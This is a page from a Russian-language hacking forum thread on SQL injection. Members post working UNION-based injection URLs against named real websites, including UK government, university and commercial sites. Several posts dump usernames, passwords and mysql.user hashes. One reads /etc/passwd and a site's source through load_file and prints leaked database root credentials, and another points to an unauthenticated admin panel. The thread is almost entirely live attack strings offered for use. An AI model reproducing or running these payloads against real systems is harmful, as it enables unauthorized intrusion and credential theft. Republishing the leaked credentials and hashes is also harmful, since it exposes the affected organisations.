SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Создание антибояна завершена.
    Все скули проверяем.
    Обновление будет проводиться раз в неделю
    http://hlamidnik.h18.ru/SQLS.html
     
    2 people like this.
  2. t00t

    t00t New Member

    Joined:
    19 Apr 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    http://0629.com.ua/doska.php?id_cat=-1'

    Скуль. Весь сайт построен на инклудах. так что слить не проблема. Кто догадается!!
     
    #2042 t00t, 22 Apr 2007
    Last edited: 22 Apr 2007
  3. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    www.suunnistus.net

    Code:
    http://www.suunnistus.net/remote/puhaih/index.php?Id=-378+union+select+1,2,3,concat(user(),char(58),version()),5,6,7,8,9,10/*
     
    1 person likes this.
  4. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.vivactiv.ru/trainings/trainers.php?id=-4+union+select+concat(id,char(58),pass),2,email+from+users/*
    понеслась!!!
     
  5. muse

    muse Elder - Старейшина

    Joined:
    25 Sep 2005
    Messages:
    28
    Likes Received:
    6
    Reputations:
    6
    www.mysql-hispano.org/page.php?id=43'
    http://www.mundanesounds.com/feature.php?id=1458 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
    http://www.rarefish.be/storing/feature.php?id=49 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
    http://www.rli.ie/news/feature.php?Id=0003 and 1=0 union select 1,2,3,4,5,6
    http://soundsect.com/feature.php?id=4%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,9
    http://www.bifa.org.uk/feature.php?id=1+union+select+1,2,3,4,5,6,7
    http://www.dpblue.com/resources-divespots-results.asp?id=5%20union%20select%201,email,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20users
    http://www.lduk.co.uk/results.php?id=60%20and%201=0%20union%20select%201,password,3%20from%20users/*
    http://www.mx-5cup.com/event/results.php?ID=255+and+1=0+union+select+1,2,id,4,password,6,7,8,9,10%20from%20users
    http://www.drapaccycling.com/results.php?id=25%20and%201=0%20union%20select%201,email,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20users
     
    1 person likes this.
  6. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    Code:
    http://www.odyssey.od.ua/show.php?cat=audio&id=-470+union+select+1,2,concat_ws(char(58),version(),user()),4,concat_ws(char(58),user,password)+from+mysql.user/*
    Code:
    http://www.odyssey.od.ua/show.php?cat=audio&id=-470+union+select+1,2,load_file(0x2f6574632f706173737764),4,concat_ws(char(58),user,password)+from+mysql.user/*
    ===> /etc/passwd

    Code:
    http://www.odyssey.od.ua/show.php?cat=audio&id=-470+union+select+1,2,load_file(0x2f7573722f6c6f63616c2f7777772f7777772e6f6479737365792e6f642e75612f73686f772e706870),4,concat_ws(char(58),user,password)+from+mysql.user/*
    ===>
    $db_login = "root";
    $db_password = "jhondoe";
    $db_name = "odyssey";
    $db_host = "localhost";
    ===================================
    звиняйте :(, уважаю ваш труд, впреть буду внимательней!!!!
     
    #2046 big_BRAT, 23 Apr 2007
    Last edited: 23 Apr 2007
  7. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Просто отлично биг брат, 3 постами выше ссылка на лист сделаных скулей, а ты постишь БОЯН, ей богу бы - поставил =\
     
  8. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    http://www.emets.ru/model.php?id='+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13, 14/*
    Проверенно антибаяном.
     
  9. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.marketingsherpa.com/article.php?ident=-1+union+select+1,2,3,4,5,concat(user,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124+from+mysql.user/*#
    
    admin:6a866df47eaec74a
     
  10. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    http://www.divaninfo.ru/base.php?tip=3&id=-66+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
     
  11. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    www.ulyanovsk.org

    Code:
    http://www.ulyanovsk.org/list/see.php?me_id=-133+union+select+1,user(),3,version(),database(),6,7,8,9/*
     
    1 person likes this.
  12. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
  13. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.spirit.rasu.ru/ecatalog.php?id=765-1&org=-1+union+select+concat(login,0x3a,password)+from+users/*&irazd=1
    Code:
    http://www.equisport.ru/article.php?id_article=-1+union+select+concat(login,0x3a,password),2,3+from+users/*&id_page=2
    http://www.equisport.ru/admin
    кривая админка без авторизации.
     
    #2053 n1†R0x, 24 Apr 2007
    Last edited: 24 Apr 2007
  14. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Code:
    http://traildevils.ch/markt.php?func=showSpecs&id=-1+union+select+1,user(),database(),4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
     
  15. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    Code:
    http://www.markkonka.com/newhomes/models.php?id=-1+union+select+1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15/*
     
  16. fYt

    fYt Elder - Старейшина

    Joined:
    11 Jan 2007
    Messages:
    54
    Likes Received:
    36
    Reputations:
    7
    http://www.inuitcircumpolar.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,USER(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*&Lang=En

    http://kompas.ascon.ru/products/index.php?id=1111111111+union+select+1,2,USER(),VERSION(),5/*
    )
     
    #2056 fYt, 25 Apr 2007
    Last edited: 25 Apr 2007
  17. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    p-range. Удружи, щелкни по кнопочке Антибоян у меня в подписи или на ту красненькую которую кэш поставил и проверь свой пост =\
    З.Ы пипец =(
     
  18. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Моя первая:
    http://ehs.informatik.uni-oldenburg.de/de/news/fullview.php?id=-1+union+select+1,2,3,4,5,6/*


    p.s.огромное спасибо Grey'ю за помощь.(помог разобраться в sql injection)
     
    1 person likes this.
  19. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    icewarn.com.au
    Code:
    http://www.icewarm.com.au/page.php?pId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user,0x3a,password)+from+mysql.user/*
    root:*70FF28D5F25133E8ED4E2799113E9C6AD38526EA
    зы: превед айсегу =\
     
  20. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Что-то давненько я тут не постил :)

    Code:
    http://www.pirateship.com.cn/article.php?id=-254%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(concat(user,char(58),password),0),0),3,4,5,6,7,8,9%20from%20mysql.user/*
    Code:
    http://www.hitchedmag.com/article.php?id=-18%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/*
    Code:
    http://www.nwce.gov.uk/view_event.php?id=-60%20union%20select%201,user(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19/*
    Code:
    http://www.monitor-nhsft.gov.uk/publications.php?id=-952%20union%20select%201,user(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19/*
    __:)__
     
    2 people like this.
Thread Status:
Not open for further replies.